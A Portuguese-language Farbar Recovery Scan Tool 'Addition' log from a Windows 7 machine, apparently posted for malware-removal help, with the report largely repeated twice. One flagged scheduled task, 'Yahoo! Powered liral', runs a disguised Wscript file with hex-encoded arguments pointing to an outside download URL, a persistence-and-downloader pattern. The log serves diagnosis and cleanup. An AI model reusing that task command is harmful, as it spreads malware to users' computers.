Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão: 17-10-2016
Executado por Familha (25-10-2016 16:28:43)
Executando a partir de C:\Users\Familha\Documents
Windows 7 Ultimate (X64) (2016-08-10 19:24:50)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-90913696-1279229543-953837338-500 - Administrator - Disabled)
Convidado (S-1-5-21-90913696-1279229543-953837338-501 - Limited - Disabled)
Familha (S-1-5-21-90913696-1279229543-953837338-1000 - Administrator - Enabled) => C:\Users\Familha
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-90913696-1279229543-953837338-1000\...\uTorrent) (Version: 3.4.2.36615 - BitTorrent Inc.)
Adobe Reader X (10.1.16) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
ASRock 3TB+ Unlocker v1.1.1 (HKLM\...\ASRock 3TB+ Unlocker_is1) (Version: 1.1.1 - ASRock Inc.)
ASRock App Charger v1.0.6 (HKLM\...\ASRock App Charger_is1) (Version: 1.0.6 - ASRock Inc.)
ASRock RapidStart v1.0.6 (HKLM\...\ASRock RapidStart_is1) (Version: - ASRock Inc.)
ASRock SmartConnect v1.0.7 (HKLM\...\ASRock SmartConnect_is1) (Version: 1.0.7 - ASRock Inc.)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 12.3.2280 - AVAST Software)
CPUID CPU-Z 1.72.1 (HKLM\...\CPUID CPU-Z_is1) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2875 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Nero 7.10.1.0 (HKLM-x32\...\Nero7_is1) (Version: 7.10.1.0 - Nero AG)
Nero Express 7 7.10 Packages (HKU\S-1-5-21-90913696-1279229543-953837338-1000\...\Nero Express 7 7.10 Packages) (Version: - ) <==== ATENÇÃO
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: - )
PLANTAS CONTRA ZOMBIES By Dark Devil (HKLM-x32\...\PLANTAS CONTRA ZOMBIES By Dark Devil) (Version: - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6813 - Realtek Semiconductor Corp.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WinRAR 5.30 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.4 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {27BBBDDB-F169-4CC3-8C36-3F099382EF13} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-10] (Google Inc.)
Task: {925C7956-71B7-4AA5-B93D-CD416A5F4CE5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-08-17] (AVAST Software)
Task: {94CCD30E-D0A5-4CE6-AC34-BF06B9139AC8} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2016-09-09] (AVAST Software)
Task: {CDEC4462-13C4-4151-A46B-721E28E559C3} - System32\Tasks\Yahoo! Powered liral => Wscript.exe "C:\ProgramData\{1D54D837-9716-52F1-11D0-CCB38B92477D}\difi.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b31443534443833372d393731362d353246312d313144302d4343423338423932343737447d5c6d6f6c616665" "433a5c50726f6772616d446174615c7b31443534443833372d393731362d353246312d313144 (a entrada de dados tem 78 mais caracteres).
Task: {E8EF74BB-3454-4C4B-BB3F-34CB0566D94A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-10] (Google Inc.)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Yahoo! Powered liral.job => Wscript.exe C:\ProgramData\{1D54D837-9716-52F1-11D0-CCB38B92477D}\difi.txt <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\Familha\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\65895cb2cb51c750\Chromium.lnk -> C:\Users\Familha\AppData\Local\chromium\Application\chrome.exe (The Chromium Authors) -> --profile-directory=Default
==================== Módulos Carregados (Whitelisted) ==============
2010-01-30 03:40 - 2010-01-30 03:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-08-10 19:22 - 2012-10-22 17:39 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-08-10 19:29 - 2003-04-18 20:06 - 00008192 _____ () C:\Windows\SysWOW64\srvany.exe
2016-08-10 19:29 - 2010-04-10 10:03 - 00077824 _____ () C:\Windows\KMService.exe
2016-10-03 17:37 - 2016-09-25 04:02 - 02279528 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-03 17:37 - 2016-09-25 04:02 - 00107112 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-09-09 16:15 - 2016-09-09 16:15 - 00169064 _____ () C:\Program Files\Alwil Software\Avast5\JsonRpcServer.dll
2016-10-25 15:31 - 2016-10-25 15:31 - 03122008 _____ () C:\Program Files\Alwil Software\Avast5\defs\16102501\algo.dll
2016-09-09 16:15 - 2016-09-09 16:15 - 00482928 _____ () C:\Program Files\Alwil Software\Avast5\ffl2.dll
2016-08-17 00:06 - 2016-08-17 00:06 - 48936448 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2016-08-10 19:19 - 2012-10-22 15:22 - 01199648 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:34 - 2009-06-10 19:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-90913696-1279229543-953837338-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familha\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: uTorrent => "C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) %systemroot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{BDEE2F73-8D15-494C-832B-47D2CB7A22CA}] => (Allow) C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{86D35711-5D7B-472C-9587-02669F9F066B}] => (Allow) C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5E86E036-A20A-4B51-9F18-322417E5D1C0}] => (Allow) C:\Users\Familha\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{00BE685A-6248-4CB6-96A5-81BDF5E7AB70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Pontos de Restauração =========================
25-09-2016 14:33:27 Ponto de Verificação Agendado
02-10-2016 22:19:46 Ponto de Verificação Agendado
14-10-2016 00:30:02 Ponto de Verificação Agendado
21-10-2016 14:13:23 Ponto de Verificação Agendado
25-10-2016 15:29:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506
25-10-2016 15:34:02 DirectX instalado
25-10-2016 15:43:49 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918
25-10-2016 15:55:57 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918
25-10-2016 16:08:01 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (08/10/2016 07:23:21 PM) (Source: MsiInstaller) (EventID: 11500) (User: Familha-PC)
Description: Produto: Intel(R) Smart Connect Technology 2.0 x64 -- Erro 1500. Outra instalação está em andamento. Você deve concluir a instalação anterior antes de continuar a instalação atual.
Error: (08/10/2016 07:20:40 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:39 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:39 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:31 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 04:46:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 257) (User: )
Description: Falha dos Serviços de Criptografia ao inicializar o Catálogo do Banco de Dados. Erro do ESENT:-546.
Error: (08/10/2016 04:46:01 PM) (Source: ESENT) (EventID: 412) (User: )
Description: Catalog Database (320) Catalog Database: Não é possível ler o cabeçalho do arquivo de log C:\Windows\system32\CatRoot2\edb.log. Erro -546.
Error: (08/10/2016 04:46:01 PM) (Source: ESENT) (EventID: 412) (User: )
Description: Catalog Database (320) Catalog Database: Não é possível ler o cabeçalho do arquivo de log C:\Windows\system32\CatRoot2\edb.log. Erro -546.
Erros de Sistema:
=============
Error: (10/21/2016 05:22:24 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a resposta de uma transação do serviço ShellHWDetection.
Error: (10/08/2016 12:17:29 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Central de Segurança terminou com o erro:
Serviço de autenticação desconhecido.
Error: (10/07/2016 08:37:50 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a resposta de uma transação do serviço defragsvc.
Error: (10/07/2016 08:37:19 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: O sistema detectou um conflito de endereço entre o endereço IP 192.168.1.100 e o sistema
que possui o endereço de hardware de rede 64-89-9A-05-C1-0D. Como resultado desse conflito, as operações de rede nesse sistema podem ser
interrompidas.
Error: (10/03/2016 05:43:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço The Free Weather Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (09/26/2016 10:44:21 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: O nome "FAMILHA-PC :0" não pôde ser registrado na interface com o endereço IP 192.168.1.105.
O computador de endereço IP 192.168.1.107 não permitiu que o nome fosse reivindicado por
este computador.
Error: (09/26/2016 10:44:20 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: O nome "FAMILHA-PC :20" não pôde ser registrado na interface com o endereço IP 192.168.1.105.
O computador de endereço IP 192.168.1.107 não permitiu que o nome fosse reivindicado por
este computador.
Error: (09/26/2016 10:44:20 PM) (Source: Server) (EventID: 2505) (User: )
Description: O servidor não pôde ligar-se com o transporte \Device\NetBT_Tcpip_{1B10FE05-4B51-4620-A013-6B42E2B10A99} porque outro computador na rede tem o mesmo nome. Não foi possível iniciar o servidor.
Error: (09/20/2016 04:36:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço aswHdsKe devido ao seguinte erro:
O Windows não pode verificar a assinatura digital deste arquivo. Talvez uma alteração recente de hardware ou software tenha instalado um arquivo com uma assinatura incorreta ou danificado, ou talvez o arquivo seja um software mal-intencionado de origem desconhecida.
Error: (09/11/2016 07:06:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Serviço de Descoberta Automática de Proxy da Web do WinHTTP devido ao seguinte erro:
Não foi possível iniciar o serviço devido a uma falha de logon.
CodeIntegrity:
===================================
Date: 2016-09-20 15:36:13.317
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-09-20 15:36:13.316
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Informações da Memória ===========================
Processador: Intel(R) Pentium(R) CPU G645 @ 2.90GHz
Percentagem de memória em uso: 44%
RAM física total: 3792.59 MB
RAM física disponível: 2100.44 MB
Virtual Total: 7583.34 MB
Virtual disponível: 5890.59 MB
==================== Drives ================================
Drive c: (Win7 64bts) (Fixed) (Total:465.66 GB) (Free:391.04 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 219800DD)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
==================== Fim de Addition.txt ============================
Executado por Familha (25-10-2016 16:28:43)
Executando a partir de C:\Users\Familha\Documents
Windows 7 Ultimate (X64) (2016-08-10 19:24:50)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-90913696-1279229543-953837338-500 - Administrator - Disabled)
Convidado (S-1-5-21-90913696-1279229543-953837338-501 - Limited - Disabled)
Familha (S-1-5-21-90913696-1279229543-953837338-1000 - Administrator - Enabled) => C:\Users\Familha
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
µTorrent (HKU\S-1-5-21-90913696-1279229543-953837338-1000\...\uTorrent) (Version: 3.4.2.36615 - BitTorrent Inc.)
Adobe Reader X (10.1.16) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.16 - Adobe Systems Incorporated)
ASRock 3TB+ Unlocker v1.1.1 (HKLM\...\ASRock 3TB+ Unlocker_is1) (Version: 1.1.1 - ASRock Inc.)
ASRock App Charger v1.0.6 (HKLM\...\ASRock App Charger_is1) (Version: 1.0.6 - ASRock Inc.)
ASRock RapidStart v1.0.6 (HKLM\...\ASRock RapidStart_is1) (Version: - ASRock Inc.)
ASRock SmartConnect v1.0.7 (HKLM\...\ASRock SmartConnect_is1) (Version: 1.0.7 - ASRock Inc.)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Avast Free Antivirus (HKLM-x32\...\avast) (Version: 12.3.2280 - AVAST Software)
CPUID CPU-Z 1.72.1 (HKLM\...\CPUID CPU-Z_is1) (Version: - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.20.1337 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2875 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506 (HKLM-x32\...\{23daf363-3020-4059-b3ae-dc4ad39fed19}) (Version: 14.0.23506.0 - Microsoft Corporation)
Nero 7.10.1.0 (HKLM-x32\...\Nero7_is1) (Version: 7.10.1.0 - Nero AG)
Nero Express 7 7.10 Packages (HKU\S-1-5-21-90913696-1279229543-953837338-1000\...\Nero Express 7 7.10 Packages) (Version: - ) <==== ATENÇÃO
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2) (Version: - )
PLANTAS CONTRA ZOMBIES By Dark Devil (HKLM-x32\...\PLANTAS CONTRA ZOMBIES By Dark Devil) (Version: - )
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6813 - Realtek Semiconductor Corp.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
WinRAR 5.30 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.4 - win.rar GmbH)
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {27BBBDDB-F169-4CC3-8C36-3F099382EF13} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-10] (Google Inc.)
Task: {925C7956-71B7-4AA5-B93D-CD416A5F4CE5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-08-17] (AVAST Software)
Task: {94CCD30E-D0A5-4CE6-AC34-BF06B9139AC8} - System32\Tasks\avast! Emergency Update => C:\Program Files\Alwil Software\Avast5\AvastEmUpdate.exe [2016-09-09] (AVAST Software)
Task: {CDEC4462-13C4-4151-A46B-721E28E559C3} - System32\Tasks\Yahoo! Powered liral => Wscript.exe "C:\ProgramData\{1D54D837-9716-52F1-11D0-CCB38B92477D}\difi.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b31443534443833372d393731362d353246312d313144302d4343423338423932343737447d5c6d6f6c616665" "433a5c50726f6772616d446174615c7b31443534443833372d393731362d353246312d313144 (a entrada de dados tem 78 mais caracteres).
Task: {E8EF74BB-3454-4C4B-BB3F-34CB0566D94A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-10] (Google Inc.)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Yahoo! Powered liral.job => Wscript.exe C:\ProgramData\{1D54D837-9716-52F1-11D0-CCB38B92477D}\difi.txt <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
ShortcutWithArgument: C:\Users\Familha\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\65895cb2cb51c750\Chromium.lnk -> C:\Users\Familha\AppData\Local\chromium\Application\chrome.exe (The Chromium Authors) -> --profile-directory=Default
==================== Módulos Carregados (Whitelisted) ==============
2010-01-30 03:40 - 2010-01-30 03:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-08-10 19:22 - 2012-10-22 17:39 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2016-08-10 19:29 - 2003-04-18 20:06 - 00008192 _____ () C:\Windows\SysWOW64\srvany.exe
2016-08-10 19:29 - 2010-04-10 10:03 - 00077824 _____ () C:\Windows\KMService.exe
2016-10-03 17:37 - 2016-09-25 04:02 - 02279528 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libglesv2.dll
2016-10-03 17:37 - 2016-09-25 04:02 - 00107112 _____ () C:\Program Files (x86)\Google\Chrome\Application\53.0.2785.143\libegl.dll
2016-09-09 16:15 - 2016-09-09 16:15 - 00169064 _____ () C:\Program Files\Alwil Software\Avast5\JsonRpcServer.dll
2016-10-25 15:31 - 2016-10-25 15:31 - 03122008 _____ () C:\Program Files\Alwil Software\Avast5\defs\16102501\algo.dll
2016-09-09 16:15 - 2016-09-09 16:15 - 00482928 _____ () C:\Program Files\Alwil Software\Avast5\ffl2.dll
2016-08-17 00:06 - 2016-08-17 00:06 - 48936448 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2016-08-10 19:19 - 2012-10-22 15:22 - 01199648 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-14 00:34 - 2009-06-10 19:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-90913696-1279229543-953837338-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Familha\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: uTorrent => "C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) %systemroot%\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe
FirewallRules: [{BDEE2F73-8D15-494C-832B-47D2CB7A22CA}] => (Allow) C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe
